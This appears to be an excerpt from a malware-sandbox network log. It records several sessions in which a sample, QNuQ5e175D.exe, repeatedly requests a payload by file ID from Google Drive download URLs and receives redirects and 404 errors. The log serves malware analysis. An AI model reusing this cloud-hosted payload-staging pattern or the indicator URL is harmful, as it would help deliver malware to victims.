                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy: script-src 'nonce-Do7OH4UsDVXExjrIIGxbZg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Server: ESF
                                                      Content-Length: 0
                                                      X-XSS-Protection: 0
                                                      X-Frame-Options: SAMEORIGIN
                                                      X-Content-Type-Options: nosniff
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Connection: close


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      19192.168.2.1149998142.250.184.2254437988C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-11 04:06:22 UTC466OUTGET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Cache-Control: no-cache
                                                      Host: drive.usercontent.google.com
                                                      Connection: Keep-Alive
                                                      Cookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
                                                      2025-01-11 04:06:23 UTC1844INHTTP/1.1 404 Not Found
                                                      X-GUploader-UploadID: AFIdbgTe8q5Xf09XMaNgsioVGNXw6ve2IKa3hpDmCVd6qYG9X3zlvKTbU4PKMfkK1C3mH87u
                                                      Content-Type: text/html; charset=utf-8
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 04:06:23 GMT
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Content-Security-Policy: script-src 'nonce-yVMzFqr-45LlEoaaWKUESw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Content-Length: 1652
                                                      Server: UploadServer
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Content-Security-Policy: sandbox allow-scripts
                                                      Connection: close
                                                      2025-01-11 04:06:23 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 39 7a 7a 59 52 70 39 52 6d 6f 76 43 55 6f 7a 31 30 7a 36 48 63 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="9zzYRp9RmovCUoz10z6HcQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      20192.168.2.1149999172.217.16.1424437988C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-11 04:06:23 UTC424OUTGET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Host: drive.google.com
                                                      Cache-Control: no-cache
                                                      Cookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
                                                      2025-01-11 04:06:24 UTC1920INHTTP/1.1 303 See Other
                                                      Content-Type: application/binary
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 04:06:24 GMT
                                                      Location: https://drive.usercontent.google.com/download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download
                                                      Strict-Transport-Security: max-age=31536000
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Content-Security-Policy: script-src 'nonce-QsrgfbcAQ--n0aKOkQ8DbA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Server: ESF
                                                      Content-Length: 0
                                                      X-XSS-Protection: 0
                                                      X-Frame-Options: SAMEORIGIN
                                                      X-Content-Type-Options: nosniff
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Connection: close


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      21192.168.2.1150000142.250.184.2254437988C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-11 04:06:24 UTC466OUTGET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Cache-Control: no-cache
                                                      Host: drive.usercontent.google.com
                                                      Connection: Keep-Alive
                                                      Cookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
                                                      2025-01-11 04:06:25 UTC1844INHTTP/1.1 404 Not Found
                                                      X-GUploader-UploadID: AFiumC5UDBcF1tDJrVDDsMZggfVo91g2qIDiD5VLUqYOhse8fUefxqhSlzT4mn0K5YkM_GDo
                                                      Content-Type: text/html; charset=utf-8
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 04:06:25 GMT
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy: script-src 'nonce-4JfukRkcZnKtvJf2QnTFbQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Content-Length: 1652
                                                      Server: UploadServer
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Content-Security-Policy: sandbox allow-scripts
                                                      Connection: close
                                                      2025-01-11 04:06:25 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6b 32 37 4c 54 54 55 55 65 65 66 67 47 36 31 6c 51 30 70 66 50 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="k27LTTUUeefgG61lQ0pfPg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      22192.168.2.1150001172.217.16.1424437988C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-11 04:06:26 UTC424OUTGET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Host: drive.google.com
                                                      Cache-Control: no-cache
                                                      Cookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
                                                      2025-01-11 04:06:26 UTC1920INHTTP/1.1 303 See Other
                                                      Content-Type: application/binary
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 04:06:26 GMT
                                                      Location: https://drive.usercontent.google.com/download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download
                                                      Strict-Transport-Security: max-age=31536000
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Content-Security-Policy: script-src 'nonce-hBPTF6RUDwAnp3f5OeLibw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Server: ESF
                                                      Content-Length: 0
                                                      X-XSS-Protection: 0
                                                      X-Frame-Options: SAMEORIGIN
                                                      X-Content-Type-Options: nosniff
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Connection: close


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      23192.168.2.1150003142.250.184.2254437988C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-11 04:06:27 UTC466OUTGET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Cache-Control: no-cache
                                                      Host: drive.usercontent.google.com
                                                      Connection: Keep-Alive
                                                      Cookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
                                                      2025-01-11 04:06:27 UTC1851INHTTP/1.1 404 Not Found
                                                      X-GUploader-UploadID: AFIdbgRdeUt8bdUq_4HxK-5PIFY0_M21CY6Ou0z4QK_BLnki3WbVCApnzLyop-9h3XYdbTsi2U7LIZ0
                                                      Content-Type: text/html; charset=utf-8
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 04:06:27 GMT
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Content-Security-Policy: script-src 'nonce-BxtnlgEUqo9CQAdAi_9dJg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Content-Length: 1652
                                                      Server: UploadServer
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Content-Security-Policy: sandbox allow-scripts
                                                      Connection: close
                                                      2025-01-11 04:06:27 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6b 6e 4d 35 59 76 70 4b 42 48 54 62 50 78 65 6e 61 42 68 54 6b 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="knM5YvpKBHTbPxenaBhTkA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      24192.168.2.1150004172.217.16.1424437988C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-11 04:06:28 UTC424OUTGET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Host: drive.google.com
                                                      Cache-Control: no-cache
                                                      Cookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
                                                      2025-01-11 04:06:28 UTC1920INHTTP/1.1 303 See Other
                                                      Content-Type: application/binary
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 04:06:28 GMT
                                                      Location: https://drive.usercontent.google.com/download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download
                                                      Strict-Transport-Security: max-age=31536000
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Content-Security-Policy: script-src 'nonce-ra6ekcHNUHz8AqYiwFzXVA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Server: ESF
                                                      Content-Length: 0
                                                      X-XSS-Protection: 0
                                                      X-Frame-Options: SAMEORIGIN
                                                      X-Content-Type-Options: nosniff
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Connection: close


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      25192.168.2.1150005142.250.184.2254437988C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-11 04:06:29 UTC466OUTGET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Cache-Control: no-cache
                                                      Host: drive.usercontent.google.com
                                                      Connection: Keep-Alive
                                                      Cookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
                                                      2025-01-11 04:06:29 UTC1844INHTTP/1.1 404 Not Found
                                                      X-GUploader-UploadID: AFIdbgTsvZ5YG8_kx--AHuOva7NzYL1i08RPYiWIpef_iCTeDVhfOyBtB0GsA_2qf8PYEMKm
                                                      Content-Type: text/html; charset=utf-8
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 04:06:29 GMT
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy: script-src 'nonce-kHN33lFu72BShGpW51I3gA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Content-Length: 1652
                                                      Server: UploadServer
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Content-Security-Policy: sandbox allow-scripts
                                                      Connection: close
                                                      2025-01-11 04:06:29 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 49 78 63 59 4b 37 4a 2d 4f 77 5f 4a 59 37 73 38 66 38 6c 5f 4c 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
